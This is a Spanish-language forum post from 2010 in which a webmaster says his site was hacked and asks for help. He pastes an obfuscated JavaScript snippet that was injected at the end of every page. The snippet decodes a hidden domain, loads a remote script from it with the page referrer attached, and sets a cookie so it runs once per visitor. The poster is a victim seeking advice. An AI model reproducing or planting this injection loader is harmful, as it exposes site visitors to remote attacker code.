Tema: hacking?? help me plis
Ver Mensaje Individual
  #1 (permalink)  
Antiguo 14/02/2010, 16:26
Avatar de kaninox
kaninox
 
Fecha de Ingreso: septiembre-2005
Ubicación: In my House
Mensajes: 3.597
Antigüedad: 18 años, 7 meses
Puntos: 49
hacking?? help me plis
hola amigos les cuento. hoy me enviaron un correo, en donde me dicen que les han hackeado la web, y pues viendo las paginas me he encontrado con un script en todas las paginas. pero no se que hace y como puedo evitarlo, aunque ya he resubido el sitio supongo lo pueden inyectar nuevamente :/ alguna idea....

Código PHP: 
Ver original
  1. <script>function DlofiYuxazazez (PilohiJinowit) { var DderedYixukca = document.cookie.indexOf (';', PilohiJinowit); if (DderedYixukca == -1) DderedYixukca = document.cookie.length; return unescape(document.cookie.substring(PilohiJinowit, DderedYixukca)); } function SzhkuSenavgox (name) { var arg = name + '='; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return DlofiYuxazazez (j); i = document.cookie.indexOf(' ', i) + 1; if (i == 0) break; } return null; } function RaxasepfXagogiwiq (name, value) { var argv = RaxasepfXagogiwiq.arguments; var argc = RaxasepfXagogiwiq.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + '=' + escape (value) + ((expires == null) ? '' : ('; expires=' + expires.toGMTString())) + ((path == null) ? '' : ('; path=' + path)) + ((domain == null) ? '' : ('; domain=' + domain)) + ((secure == true) ? '; secure' : ''); } if (SzhkuSenavgox('o') == null) { var DukiqesMizug = 'HGYFFYFiNWFRTnIIDKIPWsZYXtYMPIXXJaLXZHSRMZlZBYlYWJZMBFIXM-RSOBFUEBQaHTVCdYDTQLCZVRYoTKVBXYQbKRXOPTUCeRDDTUA-PQXOFAHVFQfJGNlKHIWBaGHWsXRPXGMBIhBJO.YKMMPcWWVAKKHKFoABVWUMQYFm'.replace(/[A-Z]/g,''); var DodiczoWeheb = document.createElement('script'); DodiczoWeheb.src = 'http://' + DukiqesMizug + '/counter/?page=' + escape(document.referrer) + '&rnd=' + Math.random() + '&fromsrv=1'; document.getElementsByTagName('head')[0].appendChild(DodiczoWeheb); var NavonucyiRalirowipa = new Date (); NavonucyiRalirowipa.setTime(NavonucyiRalirowipa.getTime() + (8*3600*1000)); RaxasepfXagogiwiq('o','1',NavonucyiRalirowipa, '/'); }</script>

esta al final de todas las paginas, ahora lo mas raro es que a entrar a la web me sale que la web es una web atacante, el tipico cartelito "sacame de aquí" como puedo quitar eso :s

saludos
__________________
Gokuh Salvo al mundo. PUNTO!!!!